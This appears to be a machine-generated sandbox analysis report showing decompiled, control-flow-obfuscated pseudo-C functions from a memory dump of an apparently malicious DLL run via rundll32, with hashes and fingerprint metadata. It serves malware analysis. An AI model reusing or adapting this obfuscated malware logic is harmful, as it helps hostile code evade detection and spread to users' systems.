                                                                        				_t192 = 0x45;
                                                                        				_v588 = _v588 / _t192;
                                                                        				_v588 = _v588 + 0xffffd4b8;
                                                                        				_v588 = _v588 ^ 0xffff9394;
                                                                        				_v592 = 0x37c6;
                                                                        				_v592 = _v592 ^ 0xfeb5582a;
                                                                        				_v592 = _v592 + 0x4179;
                                                                        				_v592 = _v592 * 0x75;
                                                                        				_v592 = _v592 ^ 0x690a6987;
                                                                        				_v576 = 0x500e;
                                                                        				_v576 = _v576 + 0xffff7079;
                                                                        				_v576 = _v576 ^ 0xffffa0e4;
                                                                        				_v568 = 0xf903;
                                                                        				_v568 = _v568 ^ 0x69a540ca;
                                                                        				_v568 = _v568 ^ 0x69a5fd2e;
                                                                        				_v600 = 0x246b;
                                                                        				_v600 = _v600 >> 0xe;
                                                                        				_t193 = _v576;
                                                                        				_v600 = _v600 * 0x3e;
                                                                        				_v600 = _v600 * 0x59;
                                                                        				_v600 = _v600 ^ 0x00007c65;
                                                                        				_v608 = 0x26e8;
                                                                        				_v608 = _v608 * 0x78;
                                                                        				_v608 = _v608 >> 9;
                                                                        				_v608 = _v608 << 7;
                                                                        				_v608 = _v608 ^ 0x00048f02;
                                                                        				L1:
                                                                        				while(_t166 != 0x6d2a7ea) {
                                                                        					if(_t166 == 0x97b55c3) {
                                                                        						_t166 = 0x10e2cb79;
                                                                        						continue;
                                                                        					}
                                                                        					if(_t166 != 0x10e2cb79) {
                                                                        						if(_t166 == 0x184d4ecd) {
                                                                        							_t160 = E10011196(_v572, _t193, _v612,  &_v556, _v588);
                                                                        							_t196 =  &(_t196[3]);
                                                                        							goto L8;
                                                                        						} else {
                                                                        							if(_t166 == 0x2f406389) {
                                                                        								return E100078F0(_t193, _v592, _v576, _v568, _v600);
                                                                        							}
                                                                        							if(_t166 != 0x34204f7e) {
                                                                        								L16:
                                                                        								if(_t166 != 0x27ada575) {
                                                                        									continue;
                                                                        								} else {
                                                                        									return _t160;
                                                                        								}
                                                                        							} else {
                                                                        								_v556 = 0x22c;
                                                                        								_t160 = E1000C951(_v564, _t193, _v580, _v604,  &_v556, _v596);
                                                                        								_t196 =  &(_t196[4]);
                                                                        								L8:
                                                                        								asm("sbb ecx, ecx");
                                                                        								_t166 = ( ~_t160 & 0xd7924461) + 0x2f406389;
                                                                        								continue;
                                                                        							}
                                                                        						}
                                                                        						L19:
                                                                        						return _t160;
                                                                        					}
                                                                        					_push(_t166);
                                                                        					_push(_t166);
                                                                        					_t160 = E100034DF(_v608);
                                                                        					_t193 = _t160;
                                                                        					if(_t160 != 0xffffffff) {
                                                                        						_t166 = 0x34204f7e;
                                                                        						continue;
                                                                        					}
                                                                        					goto L19;
                                                                        				}
                                                                        				_push(_t188);
                                                                        				_push( &_v556);
                                                                        				if(_a4() == 0) {
                                                                        					_t166 = 0x2f406389;
                                                                        					goto L16;
                                                                        				} else {
                                                                        					_t166 = 0x184d4ecd;
                                                                        					goto L1;
                                                                        				}
                                                                        				goto L19;
                                                                        			}

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ;Mu$MD$TK$e|$yA$~O 4$~O 4$&
                                                                        • API String ID: 0-3555957702
                                                                        • Opcode ID: 31af485f9c8a2b5b624dfb714d0d2516dbbc443f0cc9696091e90e43e2690cbc
                                                                        • Instruction ID: 7a5233acb4f0b7343e1caab6bffd9fb5e66aa78ce2eca496758581743dfb795c
                                                                        • Opcode Fuzzy Hash: 31af485f9c8a2b5b624dfb714d0d2516dbbc443f0cc9696091e90e43e2690cbc
                                                                        • Instruction Fuzzy Hash: 1E7166B15093029FD368CF22D94991FBBE1EBC4708F408A1DF5959A2A0D775CA49CF83
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E10015AB8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
                                                                        				char _v4;
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				signed int _v48;
                                                                        				signed int _v52;
                                                                        				signed int _v56;
                                                                        				signed int _v60;
                                                                        				signed int _v64;
                                                                        				signed int _v68;
                                                                        				void* _t155;
                                                                        				void* _t175;
                                                                        				signed int _t176;
                                                                        				signed int _t177;
                                                                        				signed int _t178;
                                                                        				signed int _t179;
                                                                        				void* _t182;
                                                                        				intOrPtr* _t198;
                                                                        				void* _t199;
                                                                        				signed int* _t202;
                                                                        
                                                                        				_push(_a16);
                                                                        				_t198 = _a12;
                                                                        				_push(_t198);
                                                                        				_push(_a8);
                                                                        				_push(_a4);
                                                                        				_push(__edx);
                                                                        				_push(__ecx);
                                                                        				E100056B2(_t155);
                                                                        				_v64 = 0xce72;
                                                                        				_t202 =  &(( &_v68)[6]);
                                                                        				_v64 = _v64 << 9;
                                                                        				_t199 = 0;
                                                                        				_t182 = 0xa327820;
                                                                        				_t176 = 0x1c;
                                                                        				_v64 = _v64 / _t176;
                                                                        				_v64 = _v64 + 0xffff8abd;
                                                                        				_v64 = _v64 ^ 0x000e49bc;
                                                                        				_v8 = 0xd869;
                                                                        				_v8 = _v8 + 0xb7;
                                                                        				_v8 = _v8 ^ 0x0000d921;
                                                                        				_v36 = 0xa5f6;
                                                                        				_v36 = _v36 + 0xffff8ce6;
                                                                        				_t177 = 0x14;
                                                                        				_v36 = _v36 / _t177;
                                                                        				_v36 = _v36 ^ 0x00004e2d;
                                                                        				_v40 = 0xc3ca;
                                                                        				_v40 = _v40 + 0x908a;
                                                                        				_t178 = 0x63;
                                                                        				_v40 = _v40 / _t178;
                                                                        				_v40 = _v40 ^ 0x00006c32;
                                                                        				_v44 = 0xe24;
                                                                        				_v44 = _v44 << 7;
                                                                        				_v44 = _v44 * 0x22;
                                                                        				_v44 = _v44 ^ 0x00f05026;
                                                                        				_v24 = 0x7d7;
                                                                        				_v24 = _v24 + 0xffffb711;
                                                                        				_v24 = _v24 ^ 0xffffb7a2;
                                                                        				_v48 = 0x8d07;
                                                                        				_v48 = _v48 + 0xfffff854;
                                                                        				_v48 = _v48 + 0xffffd8f0;
                                                                        				_v48 = _v48 ^ 0x00001ba2;
                                                                        				_v68 = 0x8813;
                                                                        				_v68 = _v68 >> 0xf;
                                                                        				_v68 = _v68 + 0x19ce;
                                                                        				_v68 = _v68 << 6;
                                                                        				_v68 = _v68 ^ 0x0006522a;
                                                                        				_v20 = 0x1e4f;
                                                                        				_v20 = _v20 << 9;
                                                                        				_v20 = _v20 ^ 0x003cb9d6;
                                                                        				_v60 = 0xca0;
                                                                        				_v60 = _v60 * 0x63;
                                                                        				_v60 = _v60 ^ 0x63869485;
                                                                        				_v60 = _v60 << 3;
                                                                        				_v60 = _v60 ^ 0x1c13f119;
                                                                        				_v28 = 0xf08e;
                                                                        				_v28 = _v28 + 0x10ed;
                                                                        				_v28 = _v28 + 0xa702;
                                                                        				_v28 = _v28 ^ 0x0001ca56;
                                                                        				_v52 = 0x57f8;
                                                                        				_v52 = _v52 << 0xc;
                                                                        				_v52 = _v52 >> 0xa;
                                                                        				_t179 = 0x4c;
                                                                        				_v52 = _v52 / _t179;
                                                                        				_v52 = _v52 ^ 0x00006698;
                                                                        				_v32 = 0xdab;
                                                                        				_v32 = _v32 << 0xc;
                                                                        				_v32 = _v32 * 0x65;
                                                                        				_v32 = _v32 ^ 0x56475ce6;
                                                                        				_v12 = 0xaec1;
                                                                        				_v12 = _v12 >> 0xd;
                                                                        				_v12 = _v12 ^ 0x0000705e;
                                                                        				_v16 = 0x4e43;
                                                                        				_v16 = _v16 * 0x64;
                                                                        				_v16 = _v16 ^ 0x001eb931;
                                                                        				_v56 = 0x98b0;
                                                                        				_v56 = _v56 + 0xe89c;
                                                                        				_v56 = _v56 + 0xb4ee;
                                                                        				_v56 = _v56 + 0xffffbf3b;
                                                                        				_v56 = _v56 ^ 0x0001c98f;
                                                                        				while(_t182 != 0xa327820) {
                                                                        					if(_t182 == 0x239384b6) {
                                                                        						E100069FC( &_v4, _v28, _v52, _v32, _v8, _v12, _t182, _a8, _t199, _t182, _t182, _v16, _v56);
                                                                        						 *_t198 = _v4;
                                                                        					} else {
                                                                        						if(_t182 == 0x352093e2) {
                                                                        							_push(_t182);
                                                                        							_t199 = E100157E8(_v4);
                                                                        							if(_t199 != 0) {
                                                                        								_t182 = 0x239384b6;
                                                                        								continue;
                                                                        							}
                                                                        						} else {
                                                                        							if(_t182 != 0x3a4d2a27) {
                                                                        								L10:
                                                                        								if(_t182 != 0x12c90a5a) {
                                                                        									continue;
                                                                        								} else {
                                                                        								}
                                                                        							} else {
                                                                        								_t175 = E100069FC( &_v4, _v36, _v40, _v44, _v64, _v24, _t182, _a8, 0, _t182, _t182, _v48, _v68);
                                                                        								_t202 =  &(_t202[0xb]);
                                                                        								if(_t175 != 0) {
                                                                        									_t182 = 0x352093e2;
                                                                        									continue;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					return _t199;
                                                                        				}
                                                                        				_t182 = 0x3a4d2a27;
                                                                        				goto L10;
                                                                        			}
                                                                        0x10015cac
                                                                        0x10015cb9
                                                                        0x10015cbd
                                                                        0x10015cc5
                                                                        0x10015ccd
                                                                        0x10015cd5
                                                                        0x10015cdd
                                                                        0x10015ce5
                                                                        0x10015ced
                                                                        0x10015cf7
                                                                        0x10015d92
                                                                        0x10015d9e
                                                                        0x10015cf9
                                                                        0x10015cfb
                                                                        0x10015d46
                                                                        0x10015d50
                                                                        0x10015d55
                                                                        0x10015d57
                                                                        0x00000000
                                                                        0x10015d57
                                                                        0x10015cfd
                                                                        0x10015d03
                                                                        0x10015d60
                                                                        0x10015d66
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10015d68
                                                                        0x10015d05
                                                                        0x10015d2e
                                                                        0x10015d33
                                                                        0x10015d38
                                                                        0x10015d3a
                                                                        0x00000000
                                                                        0x10015d3a
                                                                        0x10015d38
                                                                        0x10015d03
                                                                        0x10015cfb
                                                                        0x10015da9
                                                                        0x10015da9
                                                                        0x10015d5b
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: x2$ x2$'*M:$'*M:$2l$CN$^p$\GV
                                                                        • API String ID: 0-2340335227
                                                                        • Opcode ID: 56ecb1fefc8d69a2ba273b89fec3f9c42f7288201eef6b1703fe88df61fba167
                                                                        • Instruction ID: 479a953338cc6602b0d49e08dd5106ea6703caedab1e58faf33a3fe997809444
                                                                        • Opcode Fuzzy Hash: 56ecb1fefc8d69a2ba273b89fec3f9c42f7288201eef6b1703fe88df61fba167
                                                                        • Instruction Fuzzy Hash: C7710EB25093819FE354CF60C98991FBBE1FB98758F505A1CF2D54A2A0D3B6C949CF82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 98%
                                                                        			E1000421E() {
                                                                        				char _v520;
                                                                        				char _v1040;
                                                                        				signed int _v1044;
                                                                        				signed int _v1048;
                                                                        				intOrPtr _v1052;
                                                                        				intOrPtr _v1056;
                                                                        				signed int _v1060;
                                                                        				signed int _v1064;
                                                                        				signed int _v1068;
                                                                        				signed int _v1072;
                                                                        				signed int _v1076;
                                                                        				signed int _v1080;
                                                                        				signed int _v1084;
                                                                        				signed int _v1088;
                                                                        				signed int _v1092;
                                                                        				signed int _v1096;
                                                                        				signed int _v1100;
                                                                        				signed int _v1104;
                                                                        				signed int _v1108;
                                                                        				signed int _v1112;
                                                                        				signed int _v1116;
                                                                        				signed int _v1120;
                                                                        				signed int _v1124;
                                                                        				signed int _v1128;
                                                                        				signed int _v1132;
                                                                        				signed int _v1136;
                                                                        				signed int _v1140;
                                                                        				signed int _v1144;
                                                                        				signed int _v1148;
                                                                        				signed int _v1152;
                                                                        				signed int _v1156;
                                                                        				signed int _v1160;
                                                                        				signed int _v1164;
                                                                        				signed int _v1168;
                                                                        				signed int _v1172;
                                                                        				signed int _v1176;
                                                                        				signed int _v1180;
                                                                        				signed int _v1184;
                                                                        				void* _t360;
                                                                        				void* _t366;
                                                                        				signed int _t408;
                                                                        				signed int _t409;
                                                                        				signed int _t410;
                                                                        				signed int _t411;
                                                                        				signed int _t412;
                                                                        				signed int _t413;
                                                                        				signed int _t414;
                                                                        				signed int _t415;
                                                                        				signed int _t416;
                                                                        				signed int _t417;
                                                                        				signed int* _t420;
                                                                        
                                                                        				_t420 =  &_v1184;
                                                                        				_v1048 = _v1048 & 0x00000000;
                                                                        				_v1044 = _v1044 & 0x00000000;
                                                                        				_t366 = 0x68d33d8;
                                                                        				_v1056 = 0x2e288a;
                                                                        				_v1052 = 0x75c5fe;
                                                                        				_v1084 = 0xa8f5;
                                                                        				_t408 = 0x17;
                                                                        				_v1084 = _v1084 / _t408;
                                                                        				_v1084 = _v1084 << 0xa;
                                                                        				_v1084 = _v1084 ^ 0x001d0b4a;
                                                                        				_v1112 = 0x1fad;
                                                                        				_v1112 = _v1112 + 0x32f;
                                                                        				_v1112 = _v1112 | 0xebab1cec;
                                                                        				_v1112 = _v1112 ^ 0xebab1aef;
                                                                        				_v1160 = 0x54dd;
                                                                        				_t409 = 0x5b;
                                                                        				_v1160 = _v1160 / _t409;
                                                                        				_v1160 = _v1160 + 0xffff837a;
                                                                        				_v1160 = _v1160 >> 0xd;
                                                                        				_v1160 = _v1160 ^ 0x00079eb6;
                                                                        				_v1064 = 0x3be9;
                                                                        				_v1064 = _v1064 + 0xc5e5;
                                                                        				_v1064 = _v1064 ^ 0x0001038f;
                                                                        				_v1152 = 0xf3a;
                                                                        				_v1152 = _v1152 >> 2;
                                                                        				_v1152 = _v1152 | 0xf0e2a687;
                                                                        				_v1152 = _v1152 ^ 0xf0e2f519;
                                                                        				_v1104 = 0x6a02;
                                                                        				_v1104 = _v1104 ^ 0xd79757ec;
                                                                        				_v1104 = _v1104 ^ 0x72111d97;
                                                                        				_v1104 = _v1104 ^ 0xa58624a2;
                                                                        				_v1180 = 0x1edb;
                                                                        				_v1180 = _v1180 << 8;
                                                                        				_v1180 = _v1180 | 0xc66b0f2d;
                                                                        				_t410 = 0x2a;
                                                                        				_v1180 = _v1180 * 0x59;
                                                                        				_v1180 = _v1180 ^ 0x02748563;
                                                                        				_v1184 = 0xc21d;
                                                                        				_v1184 = _v1184 + 0xffff4953;
                                                                        				_v1184 = _v1184 + 0x9d58;
                                                                        				_v1184 = _v1184 + 0xffffc405;
                                                                        				_v1184 = _v1184 ^ 0x000079fa;
                                                                        				_v1068 = 0xa3cf;
                                                                        				_v1068 = _v1068 << 0xd;
                                                                        				_v1068 = _v1068 ^ 0x1479d59b;
                                                                        				_v1096 = 0x8d67;
                                                                        				_v1096 = _v1096 / _t410;
                                                                        				_v1096 = _v1096 >> 0xe;
                                                                        				_v1096 = _v1096 ^ 0x00006505;
                                                                        				_v1076 = 0xcc46;
                                                                        				_t411 = 0x5a;
                                                                        				_v1076 = _v1076 * 0x1b;
                                                                        				_v1076 = _v1076 ^ 0x0015fa07;
                                                                        				_v1172 = 0x912b;
                                                                        				_v1172 = _v1172 ^ 0x3d1f1ee2;
                                                                        				_v1172 = _v1172 + 0x5bc5;
                                                                        				_v1172 = _v1172 + 0xeec;
                                                                        				_v1172 = _v1172 ^ 0x3d1fd618;
                                                                        				_v1088 = 0xd14f;
                                                                        				_v1088 = _v1088 / _t411;
                                                                        				_v1088 = _v1088 << 2;
                                                                        				_v1088 = _v1088 ^ 0x00001f20;
                                                                        				_v1060 = 0x3e83;
                                                                        				_v1060 = _v1060 ^ 0xd304f88f;
                                                                        				_v1060 = _v1060 ^ 0xd304fa7e;
                                                                        				_v1168 = 0xb05c;
                                                                        				_v1168 = _v1168 << 8;
                                                                        				_t412 = 0x34;
                                                                        				_v1168 = _v1168 / _t412;
                                                                        				_v1168 = _v1168 ^ 0xc0861c97;
                                                                        				_v1168 = _v1168 ^ 0xc0851309;
                                                                        				_v1108 = 0xe1c2;
                                                                        				_v1108 = _v1108 ^ 0xa90fabc2;
                                                                        				_v1108 = _v1108 | 0xcfc04e49;
                                                                        				_v1108 = _v1108 ^ 0xefcf6bdd;
                                                                        				_v1140 = 0x68db;
                                                                        				_t413 = 0x4f;
                                                                        				_v1140 = _v1140 / _t413;
                                                                        				_v1140 = _v1140 >> 3;
                                                                        				_v1140 = _v1140 ^ 0x00007a7a;
                                                                        				_v1176 = 0x96b;
                                                                        				_v1176 = _v1176 | 0xfb94fdcf;
                                                                        				_v1176 = _v1176 << 2;
                                                                        				_v1176 = _v1176 ^ 0xee53e864;
                                                                        				_v1124 = 0x2254;
                                                                        				_v1124 = _v1124 ^ 0xa48881a1;
                                                                        				_v1124 = _v1124 << 0xb;
                                                                        				_v1124 = _v1124 ^ 0x451fa827;
                                                                        				_v1100 = 0x5734;
                                                                        				_v1100 = _v1100 ^ 0x74517f62;
                                                                        				_t414 = 7;
                                                                        				_v1100 = _v1100 * 0x13;
                                                                        				_v1100 = _v1100 ^ 0xa205a981;
                                                                        				_v1132 = 0x66ff;
                                                                        				_v1132 = _v1132 * 0x1f;
                                                                        				_v1132 = _v1132 + 0xf308;
                                                                        				_v1132 = _v1132 ^ 0x000d172f;
                                                                        				_v1080 = 0x2972;
                                                                        				_v1080 = _v1080 * 0x38;
                                                                        				_v1080 = _v1080 ^ 0x000935ad;
                                                                        				_v1116 = 0x9ff8;
                                                                        				_v1116 = _v1116 >> 0xf;
                                                                        				_v1116 = _v1116 + 0xfffff067;
                                                                        				_v1116 = _v1116 ^ 0xffff9674;
                                                                        				_v1092 = 0x2f3f;
                                                                        				_v1092 = _v1092 ^ 0x892685f6;
                                                                        				_v1092 = _v1092 + 0xffff53b4;
                                                                        				_v1092 = _v1092 ^ 0x8925829b;
                                                                        				_v1164 = 0xb542;
                                                                        				_v1164 = _v1164 | 0x5ab5abdf;
                                                                        				_v1164 = _v1164 + 0xffffa79d;
                                                                        				_v1164 = _v1164 / _t414;
                                                                        				_v1164 = _v1164 ^ 0x0cf5716d;
                                                                        				_v1144 = 0x47b6;
                                                                        				_v1144 = _v1144 * 0x4c;
                                                                        				_v1144 = _v1144 | 0xf71f6dca;
                                                                        				_v1144 = _v1144 ^ 0xf71f15ee;
                                                                        				_v1072 = 0x81ab;
                                                                        				_v1072 = _v1072 * 0x49;
                                                                        				_v1072 = _v1072 ^ 0x00249dbb;
                                                                        				_v1148 = 0xb5d2;
                                                                        				_v1148 = _v1148 * 0x6d;
                                                                        				_t415 = 0x2c;
                                                                        				_v1148 = _v1148 / _t415;
                                                                        				_v1148 = _v1148 ^ 0x0001b92b;
                                                                        				_v1120 = 0xe5fa;
                                                                        				_v1120 = _v1120 >> 0x10;
                                                                        				_v1120 = _v1120 >> 9;
                                                                        				_v1120 = _v1120 ^ 0x00005e7f;
                                                                        				_v1156 = 0xab36;
                                                                        				_t416 = 0x43;
                                                                        				_v1156 = _v1156 / _t416;
                                                                        				_v1156 = _v1156 >> 5;
                                                                        				_v1156 = _v1156 << 6;
                                                                        				_v1156 = _v1156 ^ 0x000049b3;
                                                                        				_v1128 = 0xa89e;
                                                                        				_t417 = 0x13;
                                                                        				_v1128 = _v1128 * 0x34;
                                                                        				_v1128 = _v1128 / _t417;
                                                                        				_v1128 = _v1128 ^ 0x0001a301;
                                                                        				_v1136 = 0xcc9;
                                                                        				_v1136 = _v1136 + 0xe654;
                                                                        				_v1136 = _v1136 * 0x71;
                                                                        				_v1136 = _v1136 ^ 0x006b6140;
                                                                        				do {
                                                                        					while(_t366 != 0x68d33d8) {
                                                                        						if(_t366 == 0xa2fd3bc) {
                                                                        							_push(0x10001000);
                                                                        							_push(_v1152);
                                                                        							E100163BF(E1001BF25(_v1160, _v1064, __eflags), __eflags, _v1180, _v1184,  &_v520,  *0x100221b0 + 0x234, _v1068,  *0x100221b0 + 0x234,  *0x100221b0 + 0x10, _v1096);
                                                                        							E1001C5F7(_v1076, _v1172, _v1088, _v1060, _t346);
                                                                        							_t420 =  &(_t420[0xb]);
                                                                        							_t366 = 0xcdbf6e0;
                                                                        							continue;
                                                                        						}
                                                                        						if(_t366 == 0xcdbf6e0) {
                                                                        							E10007C9A( &_v1040, _v1168, _t366, _v1108, _v1140);
                                                                        							E1001BAE0( &_v1040,  &_v1040,  &_v1040);
                                                                        							E10013D7C( &_v1040, __eflags, _v1116, _v1092,  &_v520);
                                                                        							_t420 =  &(_t420[9]);
                                                                        							_t366 = 0x3500b19e;
                                                                        							continue;
                                                                        						}
                                                                        						if(_t366 == 0x24c46d14) {
                                                                        							_t360 = E10018F65();
                                                                        							L10:
                                                                        							_t366 = 0xa2fd3bc;
                                                                        							continue;
                                                                        						}
                                                                        						if(_t366 == 0x304a50c6) {
                                                                        							_t360 = E1000704B();
                                                                        							goto L10;
                                                                        						}
                                                                        						if(_t366 != 0x3500b19e) {
                                                                        							goto L17;
                                                                        						}
                                                                        						 *((short*)(E10001E13(_v1164, _v1144, _v1072, _v1148,  &_v520))) = 0;
                                                                        						_t281 =  &_v1156; // 0x6b6140
                                                                        						return E1001BE71(_v1120,  &_v520,  *_t281, _v1128, _v1136);
                                                                        					}
                                                                        					__eflags =  *((intOrPtr*)( *0x100221b0 + 0x22c));
                                                                        					if(__eflags == 0) {
                                                                        						_t366 = 0x24c46d14;
                                                                        						goto L17;
                                                                        					}
                                                                        					_t366 = 0x304a50c6;
                                                                        					continue;
                                                                        					L17:
                                                                        					__eflags = _t366 - 0x360d39a3;
                                                                        				} while (__eflags != 0);
                                                                        				return _t360;
                                                                        			}

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4W$?/$@ak$T"$dS$r)$;
                                                                        • API String ID: 0-3846280122
                                                                        • Opcode ID: 8777fcd8c6a0117b101e56232f2fabb5ebae04027da6477abffc8acb09d1d06a
                                                                        • Instruction ID: aaaead02f87506f2cc3ba4b8236e1e241c9b44c198d9f5d598770aa8f5f1306b
                                                                        • Opcode Fuzzy Hash: 8777fcd8c6a0117b101e56232f2fabb5ebae04027da6477abffc8acb09d1d06a
                                                                        • Instruction Fuzzy Hash: FFF131715083809FE368CF25C489A4FBBE2FBC5758F10891DF19A8A260DBB58949CF43
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 90%
                                                                        			E1001EDB9() {
                                                                        				char _v520;
                                                                        				char _v1040;
                                                                        				char _v1560;
                                                                        				signed int _v1564;
                                                                        				signed int _v1568;
                                                                        				signed int _v1572;
                                                                        				signed int _v1576;
                                                                        				signed int _v1580;
                                                                        				signed int _v1584;
                                                                        				signed int _v1588;
                                                                        				signed int _v1592;
                                                                        				signed int _v1596;
                                                                        				signed int _v1600;
                                                                        				signed int _v1604;
                                                                        				signed int _v1608;
                                                                        				signed int _v1612;
                                                                        				signed int _v1616;
                                                                        				signed int _v1620;
                                                                        				signed int _v1624;
                                                                        				signed int _v1628;
                                                                        				signed int _v1632;
                                                                        				signed int _v1636;
                                                                        				signed int _v1640;
                                                                        				signed int _v1644;
                                                                        				signed int _v1648;
                                                                        				signed int _v1652;
                                                                        				signed int _v1656;
                                                                        				signed int _v1660;
                                                                        				void* _t250;
                                                                        				void* _t253;
                                                                        				void* _t263;
                                                                        				void* _t289;
                                                                        				signed int _t290;
                                                                        				signed int _t291;
                                                                        				signed int _t292;
                                                                        				signed int _t293;
                                                                        				signed int _t294;
                                                                        				signed int _t295;
                                                                        				signed int* _t298;
                                                                        
                                                                        				_t298 =  &_v1660;
                                                                        				_v1584 = 0xa79a;
                                                                        				_v1584 = _v1584 + 0xffffb587;
                                                                        				_t263 = 0x29655c79;
                                                                        				_v1584 = _v1584 ^ 0x00005d08;
                                                                        				_v1600 = 0x98d7;
                                                                        				_v1600 = _v1600 << 3;
                                                                        				_v1600 = _v1600 >> 2;
                                                                        				_v1600 = _v1600 ^ 0x00015089;
                                                                        				_v1576 = 0x4e32;
                                                                        				_v1576 = _v1576 * 0x22;
                                                                        				_t289 = 0;
                                                                        				_v1576 = _v1576 ^ 0x000a4295;
                                                                        				_v1616 = 0x1d29;
                                                                        				_v1616 = _v1616 + 0xffff7723;
                                                                        				_v1616 = _v1616 >> 7;
                                                                        				_v1616 = _v1616 ^ 0x01ffbac3;
                                                                        				_v1632 = 0x8dbf;
                                                                        				_v1632 = _v1632 >> 0xa;
                                                                        				_t290 = 0x76;
                                                                        				_v1632 = _v1632 * 0x3a;
                                                                        				_v1632 = _v1632 | 0x3b821885;
                                                                        				_v1632 = _v1632 ^ 0x3b827377;
                                                                        				_v1640 = 0x104a;
                                                                        				_v1640 = _v1640 / _t290;
                                                                        				_v1640 = _v1640 >> 0x10;
                                                                        				_v1640 = _v1640 + 0xffff7725;
                                                                        				_v1640 = _v1640 ^ 0xffff57b6;
                                                                        				_v1580 = 0xe6dc;
                                                                        				_v1580 = _v1580 ^ 0xc8d716f9;
                                                                        				_v1580 = _v1580 ^ 0xc8d7d197;
                                                                        				_v1592 = 0xe0fa;
                                                                        				_t291 = 0x2f;
                                                                        				_v1592 = _v1592 / _t291;
                                                                        				_v1592 = _v1592 ^ 0x0000698d;
                                                                        				_v1564 = 0x5e4f;
                                                                        				_v1564 = _v1564 + 0xffff7efe;
                                                                        				_v1564 = _v1564 ^ 0xffffb6a6;
                                                                        				_v1660 = 0xba44;
                                                                        				_v1660 = _v1660 * 0x61;
                                                                        				_v1660 = _v1660 | 0x90c21cb8;
                                                                        				_v1660 = _v1660 ^ 0xb89d15b1;
                                                                        				_v1660 = _v1660 ^ 0x285bb090;
                                                                        				_v1572 = 0x49e8;
                                                                        				_v1572 = _v1572 | 0x7392aca1;
                                                                        				_v1572 = _v1572 ^ 0x7392e7ec;
                                                                        				_v1636 = 0x1558;
                                                                        				_v1636 = _v1636 + 0xffffdbcc;
                                                                        				_v1636 = _v1636 + 0xffffaf90;
                                                                        				_v1636 = _v1636 | 0x27f9081b;
                                                                        				_v1636 = _v1636 ^ 0xffff923a;
                                                                        				_v1620 = 0xb008;
                                                                        				_v1620 = _v1620 ^ 0x6f98128b;
                                                                        				_v1620 = _v1620 + 0xffff628e;
                                                                        				_v1620 = _v1620 ^ 0x6f98181c;
                                                                        				_v1652 = 0x8c98;
                                                                        				_v1652 = _v1652 + 0xffff2e73;
                                                                        				_v1652 = _v1652 ^ 0xfa65a217;
                                                                        				_v1652 = _v1652 ^ 0x9182de5d;
                                                                        				_v1652 = _v1652 ^ 0x9418af52;
                                                                        				_v1644 = 0x793;
                                                                        				_v1644 = _v1644 ^ 0x7d1bb9ea;
                                                                        				_v1644 = _v1644 << 0xa;
                                                                        				_v1644 = _v1644 >> 3;
                                                                        				_v1644 = _v1644 ^ 0x0ddf10b4;
                                                                        				_v1568 = 0x9636;
                                                                        				_v1568 = _v1568 << 8;
                                                                        				_v1568 = _v1568 ^ 0x009600d5;
                                                                        				_v1648 = 0x45b1;
                                                                        				_v1648 = _v1648 ^ 0x353fc9cd;
                                                                        				_v1648 = _v1648 + 0x9448;
                                                                        				_v1648 = _v1648 + 0xffff2c3a;
                                                                        				_v1648 = _v1648 ^ 0x353f36fa;
                                                                        				_v1608 = 0xcb4a;
                                                                        				_v1608 = _v1608 ^ 0xf323fa50;
                                                                        				_v1608 = _v1608 + 0xfffff921;
                                                                        				_v1608 = _v1608 ^ 0xf3231221;
                                                                        				_v1656 = 0xe414;
                                                                        				_v1656 = _v1656 << 5;
                                                                        				_t292 = 0x14;
                                                                        				_v1656 = _v1656 * 0xb;
                                                                        				_v1656 = _v1656 / _t292;
                                                                        				_v1656 = _v1656 ^ 0x000fea65;
                                                                        				_v1588 = 0xfdd9;
                                                                        				_v1588 = _v1588 ^ 0x3c6de270;
                                                                        				_v1588 = _v1588 ^ 0x3c6d203a;
                                                                        				_v1596 = 0x9110;
                                                                        				_t293 = 0x5b;
                                                                        				_v1596 = _v1596 / _t293;
                                                                        				_v1596 = _v1596 ^ 0xad99dc79;
                                                                        				_v1596 = _v1596 ^ 0xad99c3bd;
                                                                        				_v1604 = 0xf5c3;
                                                                        				_v1604 = _v1604 + 0xffffe486;
                                                                        				_t294 = 0x52;
                                                                        				_v1604 = _v1604 / _t294;
